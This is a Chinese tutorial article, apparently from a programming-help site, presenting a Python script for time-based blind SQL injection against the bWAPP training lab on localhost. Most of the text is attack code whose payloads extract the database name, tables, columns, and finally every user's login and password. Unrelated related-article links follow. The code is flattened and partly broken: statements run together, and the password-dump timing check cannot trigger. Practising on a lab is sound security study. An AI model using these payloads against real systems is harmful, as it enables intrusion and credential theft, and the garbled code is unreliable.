sql盲注python脚本学习 (基于bWAPP靶场)

2024-08-25 03:44
文章标签 python sql 学习 靶场 脚本 database 盲注 bwapp

本文主要是介绍sql盲注python脚本学习 (基于bWAPP靶场),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

全局部分 

# 数组转字符串
from shlex import join
# 请求
import requests
# 记时
import timer = requests.session()

登录 

def login():login_url = 'http://127.0.0.1:1234/login.php'params = dict(login='bee',password='bug',security_level=0,form='submit')res = r.post(login_url, params)print(res) # 返回的响应码

获取当前库名

def get_db_name_length():len = 1while(1):sql_str = f"1' or if(length(database())={len},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time()-start)>1: return lenlen+=1def get_db_name(max):db_name = [''] * maxfor len in range(1,max+1,1):ACI = 48while(ACI<128):sql_str = f"1' or if(ascii(substr(database(),{len},1))={ACI},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:db_name[len-1]=chr(ACI)breakACI +=1return db_namedb_name = get_db_name(get_db_name_length())
print(join(db_name))
# 结果:b W A P P

获取全部表名

def get_table_name_length():len = 1while(1):sql_str = f"1' or if(length((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))={len},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time()-start)>1:return lenlen+=1def get_table_name(max):table_name = [''] * maxfor len in range(1,max+1,1):ACI = 48while(ACI<128):sql_str = f"1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'),{len},1))={ACI},sleep(1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:print(chr(ACI))table_name[len-1]=chr(ACI)breakACI +=1return table_nametable_name=get_table_name(get_table_name_length())
print(join(table_name))
# 结果:b l o g '' h e r o e s '' m o v i e s '' u s e r s '' v i s i t o r s

获取字段名

仅仅更改sql_str

sql_str = f"1' or if(length((select group_concat(column_name) 
from information_schema.columns where table_schema='bWAPP' and table_name='users'))=
{len},sleep(1),1) -- "sql_str = f"1' or if(ascii(substr((select group_concat(column_name) 
from information_schema.columns where table_schema='bWAPP' and table_name='users'),
{len},1))={ACI},sleep(1),1) -- "

获取用户信息

def get_users_passwd():cou = 1while (1):sql_str = f"1' or if(length((select group_concat(concat(login,'-',password)) from bWAPP.users))={cou},sleep(0.1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:print(cou)breakcou+=1user_str = ['']*coufor x in range(1,cou,1):ACI = 48while (ACI < 128):sql_str = f"1' or if(ascii(substr((select group_concat(concat(login,'-',password)) from bWAPP.users),{x},1))={ACI},sleep(0.1),1) -- "url = f'http://127.0.0.1:1234/sqli_15.php?title={sql_str}&action=search'start = time.time()r.get(url)if (time.time() - start) > 1:print(chr(ACI))user_str[x-1]=chr(ACI)breakACI+=1return join(user_str)

这篇关于sql盲注python脚本学习 (基于bWAPP靶场)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/1104449

相关文章

python中各种常见文件的读写操作与类型转换详细指南

python中各种常见文件的读写操作与类型转换详细指南

《python中各种常见文件的读写操作与类型转换详细指南》这篇文章主要为大家详细介绍了python中各种常见文件(txt,xls,csv,sql,二进制文件)的读写操作与类型转换,感兴趣的小伙伴可以跟... 目录1.文件txt读写标准用法1.1写入文件1.2读取文件2. 二进制文件读取3. 大文件读取3.1
阅读更多...
使用Python实现一个优雅的异步定时器

使用Python实现一个优雅的异步定时器

《使用Python实现一个优雅的异步定时器》在Python中实现定时器功能是一个常见需求,尤其是在需要周期性执行任务的场景下,本文给大家介绍了基于asyncio和threading模块,可扩展的异步定... 目录需求背景代码1. 单例事件循环的实现2. 事件循环的运行与关闭3. 定时器核心逻辑4. 启动与停
阅读更多...
基于Python实现读取嵌套压缩包下文件的方法

基于Python实现读取嵌套压缩包下文件的方法

《基于Python实现读取嵌套压缩包下文件的方法》工作中遇到的问题,需要用Python实现嵌套压缩包下文件读取,本文给大家介绍了详细的解决方法,并有相关的代码示例供大家参考,需要的朋友可以参考下... 目录思路完整代码代码优化思路打开外层zip压缩包并遍历文件:使用with zipfile.ZipFil
阅读更多...
Python处理函数调用超时的四种方法

Python处理函数调用超时的四种方法

《Python处理函数调用超时的四种方法》在实际开发过程中,我们可能会遇到一些场景,需要对函数的执行时间进行限制,例如,当一个函数执行时间过长时,可能会导致程序卡顿、资源占用过高,因此,在某些情况下,... 目录前言func-timeout1. 安装 func-timeout2. 基本用法自定义进程subp
阅读更多...
Python实现word文档内容智能提取以及合成

Python实现word文档内容智能提取以及合成

《Python实现word文档内容智能提取以及合成》这篇文章主要为大家详细介绍了如何使用Python实现从10个左右的docx文档中抽取内容,再调整语言风格后生成新的文档,感兴趣的小伙伴可以了解一下... 目录核心思路技术路径实现步骤阶段一:准备工作阶段二:内容提取 (python 脚本)阶段三:语言风格调
阅读更多...
Python结合PyWebView库打造跨平台桌面应用

Python结合PyWebView库打造跨平台桌面应用

《Python结合PyWebView库打造跨平台桌面应用》随着Web技术的发展,将HTML/CSS/JavaScript与Python结合构建桌面应用成为可能,本文将系统讲解如何使用PyWebView... 目录一、技术原理与优势分析1.1 架构原理1.2 核心优势二、开发环境搭建2.1 安装依赖2.2 验
阅读更多...
Java使用ANTLR4对Lua脚本语法校验详解

Java使用ANTLR4对Lua脚本语法校验详解

《Java使用ANTLR4对Lua脚本语法校验详解》ANTLR是一个强大的解析器生成器,用于读取、处理、执行或翻译结构化文本或二进制文件,下面就跟随小编一起看看Java如何使用ANTLR4对Lua脚本... 目录什么是ANTLR?第一个例子ANTLR4 的工作流程Lua脚本语法校验准备一个Lua Gramm
阅读更多...
一文详解如何在Python中从字符串中提取部分内容

一文详解如何在Python中从字符串中提取部分内容

《一文详解如何在Python中从字符串中提取部分内容》:本文主要介绍如何在Python中从字符串中提取部分内容的相关资料,包括使用正则表达式、Pyparsing库、AST(抽象语法树)、字符串操作... 目录前言解决方案方法一:使用正则表达式方法二:使用 Pyparsing方法三:使用 AST方法四:使用字
阅读更多...
数据库面试必备之MySQL中的乐观锁与悲观锁

数据库面试必备之MySQL中的乐观锁与悲观锁

《数据库面试必备之MySQL中的乐观锁与悲观锁》:本文主要介绍数据库面试必备之MySQL中乐观锁与悲观锁的相关资料,乐观锁适用于读多写少的场景,通过版本号检查避免冲突,而悲观锁适用于写多读少且对数... 目录一、引言二、乐观锁(一)原理(二)应用场景(三)示例代码三、悲观锁(一)原理(二)应用场景(三)示例
阅读更多...
Python列表去重的4种核心方法与实战指南详解

Python列表去重的4种核心方法与实战指南详解

《Python列表去重的4种核心方法与实战指南详解》在Python开发中,处理列表数据时经常需要去除重复元素,本文将详细介绍4种最实用的列表去重方法,有需要的小伙伴可以根据自己的需要进行选择... 目录方法1:集合(set)去重法(最快速)方法2:顺序遍历法(保持顺序)方法3:副本删除法(原地修改)方法4:
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2